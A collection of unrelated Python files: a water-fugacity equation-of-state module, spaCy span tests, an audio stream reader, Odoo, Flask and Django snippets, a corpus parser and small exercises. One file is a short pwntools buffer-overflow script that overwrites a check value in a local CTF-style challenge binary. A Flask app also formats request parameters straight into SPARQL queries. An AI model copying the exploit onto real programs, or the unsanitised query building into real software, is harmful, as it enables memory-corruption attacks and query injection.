PS_COEFF[4][3] = -0.16580167*math.pow(10, 2)
PS_COEFF[4][4] = 0.76560762*math.pow(10, -1)
PS_COEFF[5][3] = 0.10917883*math.pow(10, 0)
PS_COEFF[6][0] = 0.38878656*math.pow(10, 13)
PS_COEFF[6][1] = -0.13494878*math.pow(10, 9)
PS_COEFF[6][2] = 0.30916564*math.pow(10, 6)
PS_COEFF[6][3] = 0.75591105*math.pow(10, 1)
PS_COEFF[7][2] = -0.65537898*math.pow(10, 5)
PS_COEFF[7][3] = 0.18810675*math.pow(10, 3)
PS_COEFF[8][0] = -0.14182435*math.pow(10, 14)
PS_COEFF[8][1] = 0.18165390*math.pow(10, 9)
PS_COEFF[8][2] = -0.19769068*math.pow(10, 6)
PS_COEFF[8][3] = -0.23530318*math.pow(10, 2)
PS_COEFF[9][2] = 0.92093375*math.pow(10, 5)
PS_COEFF[9][3] = 0.12246777*math.pow(10, 3)
CS = np.zeros([10])
# Constants
# CONSTANT_B = 2451 #(Holyoke and Kronenberg, 2010) #3631 (Stipp and Tullis, 2003)
#EXPONENT = -1.26
# 1.45E4 -1.47 Twiss 1977 #Get more from literature
# 339 -0.58 Koch 1983 # from Gleason and Tullis, 1993 (GRL)
PIEZOMETERS = {
'ST03': {'Constant_B': 3631, 'Exponent': -1.26, "Name": "Stipp and Tullis (2003)"},
'HK10': {'Constant_B': 2451, 'Exponent': -1.26, "Name": "Holyoke and Kronenberg (2010)"},
'K83': {'Constant_B': 339, 'Exponent': -0.58, "Name": "Koch (1983)"},
'T77': {'Constant_B': 1.45E4, 'Exponent': -1.47, "Name": "Twiss (1977)"}
}
FLOW_LAWS = {
"KT84": {"A": 2.2E-6, "n": 2.7, "Q": 1.2E5, "Name": "Kronenberg and Tullis (1984)"},
'GT95wm': {"A": 1.8E-8, "n": 4, "Q": 1.37E5, "Name": "Gleason and Tullis (1995) with melt"},
'J84': {"A": 2.88E-3, "n": 1.8, "Q": 1.51E5, "Name": "Jaoul et al. (1984)"},
'K89': {"A": 1.16E-7, "n": 2.72, "Q": 1.34E5, "Name": "Koch et al. (1989)"},
'HC82': {"A": 1.99E-2, "n": 1.8, "Q": 1.67E5, "Name": "Hansen and Carter (1982)"},
'LP92g': {"A": 6.6E-8, "n": 3.1, "Q": 1.35E5, "Name": "Luan and Paterson (1992) with gel"},
'LP92a': {"A": 3.98E-10, "n": 4, "Q": 1.35E5, "Name": "Luan and Paterson (1992) with acid"},
"H01": {"A": 6.3E-12, "n": 4, "Q": 1.35E5, "Name": "Hirth et al. (2001)"},
"RB04": {"A": 1.2E-5, "n": 2.97, "Q": 2.42E5, "Name": "Rutter and Brodie (2004)"}
}
def calculate_coefficient_table(temperature):
for i in range(0, len(PS_COEFF)):
CS[i] = PS_COEFF[i][0]*math.pow(temperature, -4)+PS_COEFF[i][1]*math.pow(temperature, -2)\
+ PS_COEFF[i][2]*math.pow(temperature, -1)\
+ PS_COEFF[i][3]+PS_COEFF[i][4]*temperature + \
PS_COEFF[i][5]*math.pow(temperature, 2)
# return CS
# CALCULATE EQUATIONS OF STATE AND FUGACITY
# Solve Equation of state, Eq 2 of Pitzer and Sterner (1994)
# Returns pressure in Pa
def eos(T, V):
den = 1/V
R = 8314472
var_num = CS[2]+2*CS[3]*den+3*CS[4] * \
math.pow(den, 2)+4*CS[5]*math.pow(den, 3)
var_denom = math.pow((CS[1]+CS[2]*den+CS[3]*math.pow(den, 2) +
CS[4]*math.pow(den, 3)+CS[5]*math.pow(den, 4)), 2)
pressure = den+CS[0]*math.pow(den, 2)-math.pow(den, 2)*(var_num/var_denom)
pressure = pressure + (CS[6]*math.pow(den, 2)*math.exp(-CS[7]
* den)+CS[8]*math.pow(den, 2)*math.exp(-CS[9]*den))
pressure = pressure*(R*T) # pressure in Pa
return pressure
# Solve for fugacity, Eq 1 of Pitzer and Sterner (1994)
# Returns fugacity in MPa
def PSfug(P, T, V):
den = 1/V
R = 8314472
quotient = CS[0]*den+(1/(CS[1]+CS[2]*den+CS[3]*math.pow(den, 2) +
CS[4]*math.pow(den, 3)+CS[5]*math.pow(den, 4))-1/CS[1])
quotient -= CS[6]/CS[7]*(math.exp(-CS[7]*den)-1)
quotient -= CS[8]/CS[9]*(math.exp(-CS[9]*den)-1)
lnf = (math.log(den) + quotient+P/(den*R*T))+math.log(R*T)-1
return math.exp(lnf)/1e6 # fugacity in MPa
# Optimizing equation to solve for volume
def fugacity_optimizer(temperature, pressure):
def fun(v):
return eos(temperature, v) - pressure
volume = opt.brentq(fun, 5, 30) # Volume in cc/mo
# Calculate fugacity
fugacity = PSfug(pressure, temperature, volume)
return fugacity
|
import pytest
from spacy.attrs import ORTH, LENGTH
from spacy.tokens import Doc, Span, Token
from spacy.vocab import Vocab
from spacy.util import filter_spans
from .test_underscore import clean_underscore # noqa: F401
@pytest.fixture
def doc(en_tokenizer):
# fmt: off
text = "This is a sentence. This is another sentence. And a third."
heads = [1, 1, 3, 1, 1, 6, 6, 8, 6, 6, 12, 12, 12, 12]
deps = ["nsubj", "ROOT", "det", "attr", "punct", "nsubj", "ROOT", "det",
"attr", "punct", "ROOT", "det", "npadvmod", "punct"]
# fmt: on
tokens = en_tokenizer(text)
return Doc(tokens.vocab, words=[t.text for t in tokens], heads=heads, deps=deps)
@pytest.fixture
def doc_not_parsed(en_tokenizer):
text = "This is a sentence. This is another sentence. And a third."
tokens = en_tokenizer(text)
doc = Doc(tokens.vocab, words=[t.text for t in tokens])
return doc
@pytest.mark.parametrize(
"i_sent,i,j,text",
[
(0, 0, len("This is a"), "This is a"),
(1, 0, len("This is another"), "This is another"),
(2, len("And "), len("And ") + len("a third"), "a third"),
(0, 1, 2, None),
],
)
def test_char_span(doc, i_sent, i, j, text):
sents = list(doc.sents)
span = sents[i_sent].char_span(i, j)
if not text:
assert not span
else:
assert span.text == text
def test_spans_sent_spans(doc):
sents = list(doc.sents)
assert sents[0].start == 0
assert sents[0].end == 5
assert len(sents) == 3
assert sum(len(sent) for sent in sents) == len(doc)
def test_spans_root(doc):
span = doc[2:4]
assert len(span) == 2
assert span.text == "a sentence"
assert span.root.text == "sentence"
assert span.root.head.text == "is"
def test_spans_string_fn(doc):
span = doc[0:4]
assert len(span) == 4
assert span.text == "This is a sentence"
def test_spans_root2(en_tokenizer):
text = "through North and South Carolina"
heads = [0, 4, 1, 1, 0]
deps = ["dep"] * len(heads)
tokens = en_tokenizer(text)
doc = Doc(tokens.vocab, words=[t.text for t in tokens], heads=heads, deps=deps)
assert doc[-2:].root.text == "Carolina"
def test_spans_span_sent(doc, doc_not_parsed):
"""Test span.sent property"""
assert len(list(doc.sents))
assert doc[:2].sent.root.text == "is"
assert doc[:2].sent.text == "This is a sentence ."
assert doc[6:7].sent.root.left_edge.text == "This"
# test on manual sbd
doc_not_parsed[0].is_sent_start = True
doc_not_parsed[5].is_sent_start = True
assert doc_not_parsed[1:3].sent == doc_not_parsed[0:5]
assert doc_not_parsed[10:14].sent == doc_not_parsed[5:]
def test_spans_lca_matrix(en_tokenizer):
"""Test span's lca matrix generation"""
tokens = en_tokenizer("the lazy dog slept")
doc = Doc(
tokens.vocab,
words=[t.text for t in tokens],
heads=[2, 2, 3, 3],
deps=["dep"] * 4,
)
lca = doc[:2].get_lca_matrix()
assert lca.shape == (2, 2)
assert lca[0, 0] == 0 # the & the -> the
assert lca[0, 1] == -1 # the & lazy -> dog (out of span)
assert lca[1, 0] == -1 # lazy & the -> dog (out of span)
assert lca[1, 1] == 1 # lazy & lazy -> lazy
lca = doc[1:].get_lca_matrix()
assert lca.shape == (3, 3)
assert lca[0, 0] == 0 # lazy & lazy -> lazy
assert lca[0, 1] == 1 # lazy & dog -> dog
assert lca[0, 2] == 2 # lazy & slept -> slept
lca = doc[2:].get_lca_matrix()
assert lca.shape == (2, 2)
assert lca[0, 0] == 0 # dog & dog -> dog
assert lca[0, 1] == 1 # dog & slept -> slept
assert lca[1, 0] == 1 # slept & dog -> slept
assert lca[1, 1] == 1 # slept & slept -> slept
def test_span_similarity_match():
doc = Doc(Vocab(), words=["a", "b", "a", "b"])
span1 = doc[:2]
span2 = doc[2:]
with pytest.warns(UserWarning):
assert span1.similarity(span2) == 1.0
assert span1.similarity(doc) == 0.0
assert span1[:1].similarity(doc.vocab["a"]) == 1.0
def test_spans_default_sentiment(en_tokenizer):
"""Test span.sentiment property's default averaging behaviour"""
text = "good stuff bad stuff"
tokens = en_tokenizer(text)
tokens.vocab[tokens[0].text].sentiment = 3.0
tokens.vocab[tokens[2].text].sentiment = -2.0
doc = Doc(tokens.vocab, words=[t.text for t in tokens])
assert doc[:2].sentiment == 3.0 / 2
assert doc[-2:].sentiment == -2.0 / 2
assert doc[:-1].sentiment == (3.0 + -2) / 3.0
def test_spans_override_sentiment(en_tokenizer):
"""Test span.sentiment property's default averaging behaviour"""
text = "good stuff bad stuff"
tokens = en_tokenizer(text)
tokens.vocab[tokens[0].text].sentiment = 3.0
tokens.vocab[tokens[2].text].sentiment = -2.0
doc = Doc(tokens.vocab, words=[t.text for t in tokens])
doc.user_span_hooks["sentiment"] = lambda span: 10.0
assert doc[:2].sentiment == 10.0
assert doc[-2:].sentiment == 10.0
assert doc[:-1].sentiment == 10.0
def test_spans_are_hashable(en_tokenizer):
"""Test spans can be hashed."""
text = "good stuff bad stuff"
tokens = en_tokenizer(text)
span1 = tokens[:2]
span2 = tokens[2:4]
assert hash(span1) != hash(span2)
span3 = tokens[0:2]
assert hash(span3) == hash(span1)
def test_spans_by_character(doc):
span1 = doc[1:-2]
# default and specified alignment mode "strict"
span2 = doc.char_span(span1.start_char, span1.end_char, label="GPE")
assert span1.start_char == span2.start_char
assert span1.end_char == span2.end_char
assert span2.label_ == "GPE"
span2 = doc.char_span(
span1.start_char, span1.end_char, label="GPE", alignment_mode="strict"
)
assert span1.start_char == span2.start_char
assert span1.end_char == span2.end_char
assert span2.label_ == "GPE"
# alignment mode "contract"
span2 = doc.char_span(
span1.start_char - 3, span1.end_char, label="GPE", alignment_mode="contract"
)
assert span1.start_char == span2.start_char
assert span1.end_char == span2.end_char
assert span2.label_ == "GPE"
# alignment mode "expand"
span2 = doc.char_span(
span1.start_char + 1, span1.end_char, label="GPE", alignment_mode="expand"
)
assert span1.start_char == span2.start_char
assert span1.end_char == span2.end_char
assert span2.label_ == "GPE"
# unsupported alignment mode
with pytest.raises(ValueError):
span2 = doc.char_span(
span1.start_char + 1, span1.end_char, label="GPE", alignment_mode="unk"
)
def test_span_to_array(doc):
span = doc[1:-2]
arr = span.to_array([ORTH, LENGTH])
assert arr.shape == (len(span), 2)
assert arr[0, 0] == span[0].orth
assert arr[0, 1] == len(span[0])
def test_span_as_doc(doc):
span = doc[4:10]
span_doc = span.as_doc()
assert span.text == span_doc.text.strip()
assert isinstance(span_doc, doc.__class__)
assert span_doc is not doc
assert span_doc[0].idx == 0
@pytest.mark.usefixtures("clean_underscore")
def test_span_as_doc_user_data(doc):
"""Test that the user_data can be preserved (but not by default). """
my_key = "my_info"
my_value = 342
doc.user_data[my_key] = my_value
Token.set_extension("is_x", default=False)
doc[7]._.is_x = True
span = doc[4:10]
span_doc_with = span.as_doc(copy_user_data=True)
span_doc_without = span.as_doc()
assert doc.user_data.get(my_key, None) is my_value
assert span_doc_with.user_data.get(my_key, None) is my_value
assert span_doc_without.user_data.get(my_key, None) is None
for i in range(len(span_doc_with)):
if i != 3:
assert span_doc_with[i]._.is_x is False
else:
assert span_doc_with[i]._.is_x is True
assert not any([t._.is_x for t in span_doc_without])
def test_span_string_label_kb_id(doc):
span = Span(doc, 0, 1, label="hello", kb_id="Q342")
assert span.label_ == "hello"
assert span.label == doc.vocab.strings["hello"]
assert span.kb_id_ == "Q342"
assert span.kb_id == doc.vocab.strings["Q342"]
def test_span_label_readonly(doc):
span = Span(doc, 0, 1)
with pytest.raises(NotImplementedError):
span.label_ = "hello"
def test_span_kb_id_readonly(doc):
span = Span(doc, 0, 1)
with pytest.raises(NotImplementedError):
span.kb_id_ = "Q342"
def test_span_ents_property(doc):
"""Test span.ents for the """
doc.ents = [
(doc.vocab.strings["PRODUCT"], 0, 1),
(doc.vocab.strings["PRODUCT"], 7, 8),
(doc.vocab.strings["PRODUCT"], 11, 14),
]
assert len(list(doc.ents)) == 3
sentences = list(doc.sents)
assert len(sentences) == 3
assert len(sentences[0].ents) == 1
# First sentence, also tests start of sentence
assert sentences[0].ents[0].text == "This"
assert sentences[0].ents[0].label_ == "PRODUCT"
assert sentences[0].ents[0].start == 0
assert sentences[0].ents[0].end == 1
# Second sentence
assert len(sentences[1].ents) == 1
assert sentences[1].ents[0].text == "another"
assert sentences[1].ents[0].label_ == "PRODUCT"
assert sentences[1].ents[0].start == 7
assert sentences[1].ents[0].end == 8
# Third sentence ents, Also tests end of sentence
assert sentences[2].ents[0].text == "a third ."
assert sentences[2].ents[0].label_ == "PRODUCT"
assert sentences[2].ents[0].start == 11
assert sentences[2].ents[0].end == 14
def test_filter_spans(doc):
# Test filtering duplicates
spans = [doc[1:4], doc[6:8], doc[1:4], doc[10:14]]
filtered = filter_spans(spans)
assert len(filtered) == 3
assert filtered[0].start == 1 and filtered[0].end == 4
assert filtered[1].start == 6 and filtered[1].end == 8
assert filtered[2].start == 10 and filtered[2].end == 14
# Test filtering overlaps with longest preference
spans = [doc[1:4], doc[1:3], doc[5:10], doc[7:9], doc[1:4]]
filtered = filter_spans(spans)
assert len(filtered) == 2
assert len(filtered[0]) == 3
assert len(filtered[1]) == 5
assert filtered[0].start == 1 and filtered[0].end == 4
assert filtered[1].start == 5 and filtered[1].end == 10
# Test filtering overlaps with earlier preference for identical length
spans = [doc[1:4], doc[2:5], doc[5:10], doc[7:9], doc[1:4]]
filtered = filter_spans(spans)
assert len(filtered) == 2
assert len(filtered[0]) == 3
assert len(filtered[1]) == 5
assert filtered[0].start == 1 and filtered[0].end == 4
assert filtered[1].start == 5 and filtered[1].end == 10
def test_span_eq_hash(doc, doc_not_parsed):
assert doc[0:2] == doc[0:2]
assert doc[0:2] != doc[1:3]
assert doc[0:2] != doc_not_parsed[0:2]
assert hash(doc[0:2]) == hash(doc[0:2])
assert hash(doc[0:2]) != hash(doc[1:3])
assert hash(doc[0:2]) != hash(doc_not_parsed[0:2])
def test_span_boundaries(doc):
start = 1
end = 5
span = doc[start:end]
for i in range(start, end):
assert span[i - start] == doc[i]
with pytest.raises(IndexError):
span[-5]
with pytest.raises(IndexError):
span[5]
def test_sent(en_tokenizer):
doc = en_tokenizer("Check span.sent raises error if doc is not sentencized.")
span = doc[1:3]
assert not span.doc.has_annotation("SENT_START")
with pytest.raises(ValueError):
span.sent
|
import numpy as np
import pyaudio
import time, sys, math
from collections import deque
from src.utils import *
class Stream_Reader:
"""
The Stream_Reader continuously reads data from a selected sound source using PyAudio
Arguments:
device: int or None: Select which audio stream to read .
rate: float or None: Sample rate to use. Defaults to something supported.
updatesPerSecond: int: How often to record new data.
"""
def __init__(self,
device = None,
rate = None,
updates_per_second = 1000,
FFT_window_size = None,
verbose = False):
self.rate = rate
self.verbose = verbose
self.pa = pyaudio.PyAudio()
#Temporary variables #hacks!
self.update_window_n_frames = 1024 #Don't remove this, needed for device testing!
self.data_buffer = None
self.device = device
if self.device is None:
self.device = self.input_device()
if self.rate is None:
self.rate = self.valid_low_rate(self.device)
self.update_window_n_frames = round_up_to_even(self.rate / updates_per_second)
self.updates_per_second = self.rate / self.update_window_n_frames
self.info = self.pa.get_device_info_by_index(self.device)
self.data_capture_delays = deque(maxlen=20)
self.new_data = False
if self.verbose:
self.data_capture_delays = deque(maxlen=20)
self.num_data_captures = 0
self.stream = self.pa.open(
format = pyaudio.paInt16,
channels = 1,
rate = self.rate,
input=True,
frames_per_buffer = self.update_window_n_frames,
stream_callback=self.non_blocking_stream_read)
print("\n##################################################################################################")
print("\nDefaulted to using first working mic, Running on:")
self.print_mic_info(self.device)
print("\n##################################################################################################")
print('Recording from %s at %d Hz\nUsing (non-overlapping) data-windows of %d samples (updating at %.2ffps)'
%(self.info["name"],self.rate, self.update_window_n_frames, self.updates_per_second))
def non_blocking_stream_read(self, in_data, frame_count, time_info, status):
if self.verbose:
start = time.time()
if self.data_buffer is not None:
self.data_buffer.append_data(np.frombuffer(in_data, dtype=np.int16))
self.new_data = True
if self.verbose:
self.num_data_captures += 1
self.data_capture_delays.append(time.time() - start)
return in_data, pyaudio.paContinue
def stream_start(self, data_windows_to_buffer = None):
self.data_windows_to_buffer = data_windows_to_buffer
if data_windows_to_buffer is None:
self.data_windows_to_buffer = int(self.updates_per_second / 2) #By default, buffer 0.5 second of audio
else:
self.data_windows_to_buffer = data_windows_to_buffer
self.data_buffer = numpy_data_buffer(self.data_windows_to_buffer, self.update_window_n_frames)
print("\n--🎙 -- Starting live audio stream...\n")
self.stream.start_stream()
self.stream_start_time = time.time()
def terminate(self):
print("👋 Sending stream termination command...")
self.stream.stop_stream()
self.stream.close()
self.pa.terminate()
def valid_low_rate(self, device, test_rates = [44100, 22050]):
"""Set the rate to the lowest supported audio rate."""
for testrate in test_rates:
if self.test_device(device, rate=testrate):
return testrate
#If none of the test_rates worked, try the default rate:
self.info = self.pa.get_device_info_by_index(device)
default_rate = int(self.info["defaultSampleRate"])
if self.test_device(device, rate=default_rate):
return default_rate
print("SOMETHING'S WRONG! I can't figure out a good sample-rate for DEVICE =>", device)
return default_rate
def test_device(self, device, rate=None):
"""given a device ID and a rate, return True/False if it's valid."""
try:
self.info = self.pa.get_device_info_by_index(device)
if not self.info["maxInputChannels"] > 0:
return False
if rate is None:
rate = int(self.info["defaultSampleRate"])
stream = self.pa.open(
format = pyaudio.paInt16,
channels = 1,
input_device_index=device,
frames_per_buffer=self.update_window_n_frames,
rate = rate,
input = True)
stream.close()
return True
except Exception as e:
#print(e)
return False
def input_device(self):
"""
See which devices can be opened for microphone input.
Return the first valid device
"""
mics=[]
for device in range(self.pa.get_device_count()):
if self.test_device(device):
mics.append(device)
if len(mics) == 0:
print("No working microphone devices found!")
sys.exit()
print("Found %d working microphone device(s): " % len(mics))
for mic in mics:
self.print_mic_info(mic)
return mics[0]
def print_mic_info(self, mic):
mic_info = self.pa.get_device_info_by_index(mic)
print('\nMIC %s:' %(str(mic)))
for k, v in sorted(mic_info.items()):
print("%s: %s" %(k, v)) |
from pyproj import Proj
# Criar um objeto para transformar projeções
p = Proj(init='epsg:3857') # código da EPSG para a projeção web mercator (g-maps)
# Converter lon/lat para web mercator e o contrário
print(p(-97.740372, 30.282642))
print(p(-10880408.440985134, 3539932.820497298, inverse=True)) |
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo import api, fields, models, _
class StockQuantityHistory(models.TransientModel):
_name = 'stock.quantity.history'
_description = 'Stock Quantity History'
compute_at_date = fields.Selection([
(0, 'Current Inventory'),
(1, 'At a Specific Date')
], string="Compute", help="Choose to analyze the current inventory or from a specific date in the past.")
date = fields.Datetime('Inventory at Date', help="Choose a date to get the inventory at that date", default=fields.Datetime.now)
def open_table(self):
self.ensure_one()
if self.compute_at_date:
tree_view_id = self.env.ref('stock.view_stock_product_tree').id
form_view_id = self.env.ref('stock.product_form_view_procurement_button').id
# We pass `to_date` in the context so that `qty_available` will be computed across
# moves until date.
action = {
'type': 'ir.actions.act_window',
'views': [(tree_view_id, 'tree'), (form_view_id, 'form')],
'view_mode': 'tree,form',
'name': _('Products'),
'res_model': 'product.product',
'domain': "[('type', '=', 'product')]",
'context': dict(self.env.context, to_date=self.date),
}
return action
else:
self.env['stock.quant']._merge_quants()
self.env['stock.quant']._unlink_zero_quants()
return self.env.ref('stock.quantsact').read()[0]
|
from flask import Flask, jsonify, request
from transformers import pipeline
import torch
from transformers import PreTrainedTokenizerFast
from transformers.models.bart import BartForConditionalGeneration
app = Flask(__name__)
# use summarize model (pipeline)
summarizer = pipeline('summarization')
# use kobart model
model = BartForConditionalGeneration.from_pretrained('../kobart_summary')
tokenizer = PreTrainedTokenizerFast.from_pretrained('gogamza/kobart-base-v1')
@app.route('/')
def hello_world():
return 'Hello World!'
@app.route('/test', methods=['GET'])
def test():
text = "This is.... Test... Flask..."
return text
@app.route('/summarize', methods=['GET'])
def predict():
text = request.args.get("text")
summary = summarizer(text, max_length=100, min_length=30, do_sample=False)
return summary[0]['summary_text']
@app.route('/kobartSum', methods=['GET'])
def kobart_summarize():
text = request.args.get("text")
input_ids = tokenizer.encode(text)
input_ids = torch.tensor(input_ids)
input_ids = input_ids.unsqueeze(0)
output = model.generate(input_ids, eos_token_id=1, max_length=512, num_beams=5)
output = tokenizer.decode(output[0], skip_special_tokens=True)
return output
if __name__ == '__main__':
app.run()
|
# Go through all downloaded raw texts and convert them to simple text, removing punctuation, etc
import utils
import unicodedata
import os
import re
from icelandicTextList import icepahcList, sagasList, modernBookList
def parseIcelandic():
RAW_FOLDER = "../rawTexts/icelandic/"
PARSED_FOLDER = "icelandic/"
authors = {}
allBooks = []
numTexts = 0
numTexts2 = 0
available = []
allNames = []
# ==============================================================================
# ==============================================================================
# get texts from icepahc
icepahcFolder = RAW_FOLDER + "icepahc-v0.9/txt/"
for text in icepahcList:
numTexts += 1
authorName = text["author"]
workName = text["title"]
id = text["id"]
textName = id + ".txt"
allNames.append(workName)
newLocation = "%s%s-%s.json" % (PARSED_FOLDER, authorName, workName)
workObject = {"name": workName, "location": "texts/" + newLocation}
if authorName in authors:
authors[authorName]["works"].append(workObject)
else:
authors[authorName] = {"author": authorName, "works": [workObject]}
t = utils.IcepahcText(authorName, workName, icepahcFolder + textName)
res = t.convert()
allBooks.extend(res["booksRaw"])
utils.safeWrite(newLocation, res, True)
# ==============================================================================
# ==============================================================================
# get texts from sagas
sagasFolder = RAW_FOLDER + "textar/fornritin/xml/"
for text in sagasList:
numTexts += 1
if (text["id"] == "F1E"):
authorName == "Snorri_Sturluson"
else:
authorName = "Anon_" + text["id"]
workName = text["title"].strip().replace(" ", "_")
allNames.append(workName + "#" + text["id"])
newLocation = "%s%s-%s.json" % (PARSED_FOLDER, authorName, workName)
workObject = {"name": workName, "location": "texts/" + newLocation}
if authorName in authors:
authors[authorName]["works"].append(workObject)
else:
authors[authorName] = {"author": authorName, "works": [workObject]}
t = utils.SagasText(authorName, workName, sagasFolder + text["id"] + ".xml")
res = t.convert()
allBooks.extend(res["booksRaw"])
utils.safeWrite(newLocation, res, True)
# ==============================================================================
# ==============================================================================
# get books from MIM corpus
modernBooksFolder = RAW_FOLDER + "MIM/baekur/"
# For each text in the list, download it
for text in modernBookList:
numTexts += 1
authorName = text["author"].strip().replace(" ", "_")
workName = text["title"].strip().replace(" ", "_")
allNames.append(workName + "#" + text["id"])
newLocation = "%s%s-%s.json" % (PARSED_FOLDER, authorName, workName)
workObject = {"name": workName, "location": "texts/" + newLocation}
if authorName in authors:
authors[authorName]["works"].append(workObject)
else:
authors[authorName] = {"author": authorName, "works": [workObject]}
# MIM texts are in the same format as Saga texts so this works fine.
t = utils.SagasText(authorName, workName, modernBooksFolder + text["id"] + ".xml")
res = t.convert()
allBooks.extend(res["booksRaw"])
utils.safeWrite(newLocation, res, True)
for author in authors:
available.append(authors[author])
utils.safeWrite(PARSED_FOLDER + "available.json", available, True)
print("Done.")
# Optionally count the characters in the corpus. This is done to find weird
# Unicode artifacts to make sure it gets removed in the cleaning step.
countChars = False#True#
if countChars:
print("Counting Chars")
chars = {}
for b in allBooks:
bookText = b["bookText"]
for char in bookText:
chars[char] = True
sortedChars = sorted(list(chars.keys()))
for c in sortedChars:
utils.printUnicodeChar(c)
print("======")
# If true, show the set of unique characters when things are decomposed
if False:
decomposedChars = {}
for c in sortedChars:
res = utils.fullyDecomposeUnicodeChar(c)
for newC in res:
decomposedChars[newC] = True
sortedDecompChars = sorted(list(decomposedChars.keys()))
for c in sortedDecompChars:
utils.printUnicodeChar(c)
if __name__ == "__main__":
parseIcelandic()
|
import platform
import subprocess
if __name__ == "__main__":
print("Running CMake...")
if platform.system() == "Windows":
subprocess.call("cmake -B build -G \"Visual Studio 16 2019\"")
elif platform.system() == "Darwin":
subprocess.call("cmake -B build -G Xcode", shell=True)
print("CMake finished.")
|
#!/usr/bin/env python3
from pwn import *
PATH = './challenge'
def get_offset():
p = process(PATH)
c = cyclic(50000)
p.sendline(c)
p.recvuntil('[check] 0x')
check = p.recvline().strip()
sequence = unhex(check) # extract cyclic from hex ptr
little_endian = u32(sequence, endian='big') # from big to little
return cyclic_find(little_endian) # find offset
offset = get_offset()
p = process(PATH)
p.sendline(b'A' * offset + pack(0xdeadbeef))
p.recvuntil('[check]')
print(p.recvall())
|
from flask import render_template, request, redirect, url_for, current_app
from pprint import pprint
from SPARQLWrapper import SPARQLWrapper, JSON
from rdflib import Graph, plugin, URIRef, Literal
from rdflib.parser import Parser
from rdflib.serializer import Serializer
import json
import re
from . import main
@main.route('/index.html', methods=['GET', 'POST'])
@main.route('/viewer.html', methods=['GET', 'POST'])
@main.route('/viewer', methods=['GET', 'POST'])
@main.route('/', methods=['GET', 'POST'])
def all_worksets():
user = request.args.get('user', '') or '"Demo user"'
worksets = select_worksets(specific_user = "BIND({0} as ?username)".format(user))
return render_template("viewer.html", worksets = worksets, user = user)
@main.route('/view_workset', methods=['GET'])
def detail_workset():
workseturi = request.args.get('uri', '')
ws = "BIND(<{0}> as ?workset) .".format(workseturi)
workset = select_worksets(ws)
return render_template("workset.html", worksets=workset)
def select_worksets(specific_workset = "", specific_user = ""):
app = current_app._get_current_object()
sparql = SPARQLWrapper(endpoint = app.config["ENDPOINT"])
sparql.setCredentials(user = app.config["SPARQLUSER"], passwd = app.config["SPARQLPASSWORD"])
selectWorksetsQuery = open(app.config["ELEPHANT_QUERY_DIR"] + "select_worksets.rq").read()
query = selectWorksetsQuery.format(specific_workset, specific_user)
sparql.setQuery(query)
sparql.setReturnFormat(JSON)
try:
results = sparql.query().convert()
except:
return {};
worksets = dict()
for result in results["results"]["bindings"]:
if result["workset"]["value"] not in worksets:
worksets[result["workset"]["value"]] = {
"uri": result["workset"]["value"],
"mod_date": result["mod_date"]["value"],
"title": result["title"]["value"],
"abstract": result["abstract"]["value"],
"user": result["username"]["value"],
"works": list()
}
if (result["saltset"]["value"] == "http://eeboo.oerc.ox.ac.uk/saltsets/htrc-wcsa_works"):
saltset = "htrc-wcsa_works"
else:
saltset = "eeboo_works"
try:
worksets[result["workset"]["value"]]["works"].append(
{
"uri": result["work"]["value"],
"worktitle": result["worktitle"]["value"],
"author": result["author"]["value"],
"creator": result["creator"]["value"],
"pubdate": result["pubdate"]["value"].replace("-01-01",""), #FIXME
"datePrecision": result["datePrecision"]["value"],
"place": result["place"]["value"],
# "imprint": result["imprint"]["value"],
"elecLoc": result["elecLoc"]["value"],
"viaf": result["viaf"]["value"],
"loc": result["loc"]["value"],
"saltset":saltset
})
except:
# FIXME unicode issue
pass
for workset in worksets:
worksets[workset]["works"] = sorted(worksets[workset]["works"], key=lambda k: (k["author"], k["worktitle"]))
return worksets
@main.route('/construct.html', methods = ['GET', 'POST'])
@main.route('/construct', methods = ['GET', 'POST'])
def construct_workset():
app = current_app._get_current_object()
sparql = SPARQLWrapper(app.config["ENDPOINT"])
sparql.setCredentials(user = app.config["SPARQLUSER"], passwd = app.config["SPARQLPASSWORD"])
# Get a list of all eeboo persons plus all HTRC persons who are NOT aligned to eeboo persons
selectPersonsQuery = open(app.config["ELEPHANT_QUERY_DIR"] + "select_persons.rq").read()
sparql.setQuery(selectPersonsQuery)
sparql.setReturnFormat(JSON)
personResults = sparql.query().convert()
persons = list()
for p in personResults["results"]["bindings"]:
persons.append({ "uri": p["uri"]["value"], "label": p["label"]["value"] })
# Get a list of all place names, distinct among both datasets
selectPlacesQuery = open(app.config["ELEPHANT_QUERY_DIR"] + "select_places.rq").read()
sparql.setQuery(selectPlacesQuery)
placeResults = sparql.query().convert()
places = list()
for p in placeResults["results"]["bindings"]:
places.append(p["place"]["value"])
# Get a list of all subject strings in HTRC
selectSubjectsQuery = open(app.config["ELEPHANT_QUERY_DIR"] + "select_subjects.rq").read()
sparql.setQuery(selectSubjectsQuery)
subjectResults = sparql.query().convert()
subjects = list()
for p in subjectResults["results"]["bindings"]:
subjects.append(p["subject"]["value"].replace("\n",""))
# Get a list of all genre strings in HTRC
selectGenresQuery = open(app.config["ELEPHANT_QUERY_DIR"] + "select_genres.rq").read()
sparql.setQuery(selectGenresQuery)
genreResults = sparql.query().convert()
genres = list()
for p in genreResults["results"]["bindings"]:
genres.append(p["genre"]["value"])
return render_template("construct.html", persons = persons, places = places, subjects = subjects, genres = genres)
|
# Generated by Django 3.2.7 on 2022-01-10 12:12
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('hood', '0006_business'),
]
operations = [
migrations.RenameField(
model_name='business',
old_name='neighbourhood',
new_name='neighborhood',
),
]
|
### Encadenamiento
F={'nombre':{'primero':'Juan','segundo':'Marcelo'},'trabajo':['profesor','ingeniero']}
print(F)
print('nombre')
print(F['nombre']['primero'])
print(F['nombre']['segundo'])
print(F['trabajo'])
print(F['trabajo'][0])
print(F['trabajo'][1])
F['trabajo'].append('pintor')
print(F)
print(F['trabajo'][2])
input() |
# -*- coding: utf-8 -*-
"""Largest Continuous Sum.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1oYbOWHDKKRyP3AkhohaVPQ1lHngeLMZF
"""
def large_cont_sum(arr):
if len(arr) == 0:
return 0
sum = largest_sum = arr[0]
current_point =0
last_point = 0
for n in arr[1:]:
sum += n
if sum > largest_sum:
largest_sum = sum
elif sum < 0:
sum = 0 #this is wrong because it could be negative as well
return largest_sum
large_cont_sum([1,2,-1,3,4,10,10,-10,-1])
# best solution
def large_cont_sum2(arr):
